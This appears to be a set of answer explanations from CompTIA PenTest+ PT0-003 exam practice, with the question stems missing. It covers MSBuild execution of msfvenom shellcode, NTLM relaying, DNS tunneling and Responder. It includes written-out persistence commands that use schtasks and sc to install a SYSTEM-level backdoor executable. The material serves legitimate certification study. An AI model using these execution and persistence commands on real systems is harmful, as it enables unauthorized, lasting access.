CompTIA PenTest+ PT0-003 Exam Practice Test

Answer : B

The provided msfvenom command creates a payload in C# format. To continue the attack using the generated shellcode in evil.xml, the most appropriate execution method involves MSBuild.exe, which can process XML files containing C# code:

Understanding MSBuild.exe:

Purpose: MSBuild is a build tool that processes project files written in XML and can execute tasks defined in the XML. It's commonly used to build .NET applications and can also execute code embedded in project files.

Command Usage:

Command: MSBuild.exe C:\evil.xml

This command tells MSBuild to process the evil.xml file, which contains the C# shellcode. MSBuild will compile and execute the code, leading to the payload execution.

Comparison with Other Commands:

regsvr32 /s /n /u C:\evil.xml: Used to register or unregister DLLs, not suitable for executing C# code.

mshta.exe C:\evil.xml: Used to execute HTML applications (HTA files), not suitable for XML containing C# code.

AppInstaller.exe C:\evil.xml: Used to install AppX packages, not relevant for executing C# code embedded in an XML file.

Using MSBuild.exe is the most appropriate method to execute the payload embedded in the XML file created by msfvenom.

Answer : A

Explanation of the Correct Option:

A (responder and ntlmrelayx.py):

Responder is a tool for intercepting and relaying NTLM authentication requests.

Since SMB signing is disabled, ntlmrelayx.py can relay authentication requests and escalate privileges to move laterally without directly brute-forcing credentials, which is stealthier.

Why Not Other Options?

B: Exploiting MS17-010 (psexec) is noisy and likely to trigger alerts.

C: Brute-forcing credentials with Hydra is highly detectable due to the volume of failed login attempts.

D: Nmap scripts like smb-brute.nse are useful for enumeration but involve brute-force methods that increase detection risk.

CompTIA Pentest+ Reference:

Domain 3.0 (Attacks and Exploits)

Answer : C

Banner grabbing is used to extract version information from services, including SSH, FTP, and web servers.

Option A (Network sniffing) : Captures packets, but does not directly reveal service versions.

Option B (IP scanning) : Identifies active hosts, but not SSH versions.

Option C (Banner grabbing) : Correct.

Can be performed with:

nc <target> 22

or

telnet <target> 22

Option D (DNS enumeration) : Retrieves domain name records, not SSH versions.

Reference: CompTIA PenTest+ PT0-003 Official Guide -- Service Enumeration & Banner Grabbing

Answer : A, E

To reenter the system remotely after the patch for the recently exploited RCE vulnerability has been deployed, the penetration tester can use schtasks.exe and sc.exe.

schtasks.exe:

Purpose: Used to create, delete, and manage scheduled tasks on Windows systems.

Persistence: By creating a scheduled task, the tester can ensure a script or program runs at a specified time, providing a persistent backdoor.

Example:

schtasks /create /tn 'Backdoor' /tr 'C:\path\to\backdoor.exe' /sc daily /ru SYSTEM

sc.exe:

Purpose: Service Control Manager command-line tool used to manage Windows services.

Persistence: By creating or modifying a service to run a malicious executable, the tester can maintain persistent access.

Example:

sc create backdoor binPath= 'C:\path\to\backdoor.exe' start= auto

Other Utilities:

rundll.exe: Used to run DLLs as applications, not typically used for persistence.

cmd.exe: General command prompt, not specifically used for creating persistence mechanisms.

chgusr.exe: Used to change install mode for Remote Desktop Session Host, not relevant for persistence.

netsh.exe: Used for network configuration, not typically used for persistence.

Pentest Reference:

Post-Exploitation: Establishing persistence is crucial to maintaining access after initial exploitation.

Windows Tools: Understanding how to leverage built-in Windows tools like schtasks.exe and sc.exe to create backdoors that persist through reboots and patches.

By using schtasks.exe and sc.exe, the penetration tester can set up persistent mechanisms that will allow reentry into the system even after the patch is applied.

Answer : A

Covert Data Exfiltration:

DNS traffic can be leveraged for covert data exfiltration because it is often allowed through firewalls and not heavily monitored.

Tools or techniques for DNS tunneling encode sensitive information into DNS queries or responses, resulting in an observable increase in DNS traffic.

Why Not Other Options?

B (URL spidering): This increases HTTP traffic, not DNS traffic.

C (HTML scrapping): Involves downloading website content, which primarily uses HTTP or HTTPS.

D (DoS attack): A DNS-based DoS attack would likely involve query floods from many sources, not necessarily related to the observed behavior in a penetration test.

CompTIA Pentest+ Reference:

Domain 3.0 (Attacks and Exploits)

Covert Communication Techniques and DNS Tunneling

Answer : B

The seq command generates a sequence of numbers, making it the best choice for iterating through IP addresses in a Class C subnet.

Option A (crunch) : Crunch generates wordlists, not IP ranges.

Option B (seq 1 254) : Correct. Generates the range 1-254 for a Class C subnet.

Option C (echo 1-254) : Outputs the string '1-254' instead of expanding it into numbers.

Option D (fl..254) : Incorrect syntax.

Reference: CompTIA PenTest+ PT0-003 Official Guide -- Bash Scripting for Automation

Answer : C

Responder es una herramienta especializada para capturar trfico LLMNR, NBNS y MDNS, y realizar ataques de spoofing y captura de hashes. Es ampliamente utilizada en entornos Windows para capturar credenciales cuando se resuelven nombres que no existen en el DNS.

Netcat y Burp Suite no estn diseados para este propsito. Nmap sirve para escaneo de redes, pero no para captura ni explotacin de LLMNR.

Referencia: PT0-003 Objective 4.2 -- Explain lateral movement techniques and privilege escalation tools (Responder is explicitly listed).